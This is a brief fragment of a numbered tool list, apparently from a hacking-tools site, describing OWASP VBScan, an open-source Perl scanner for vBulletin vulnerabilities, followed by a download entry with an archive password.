  23. OWASP VBScan (short for [VB]ulletin Vulnerability [Scan]ner) is an opensource project in perl programming language to detect VBulletin CMS vulnerabilities and analysis them .
  24. Download: Password: level23hacktools.com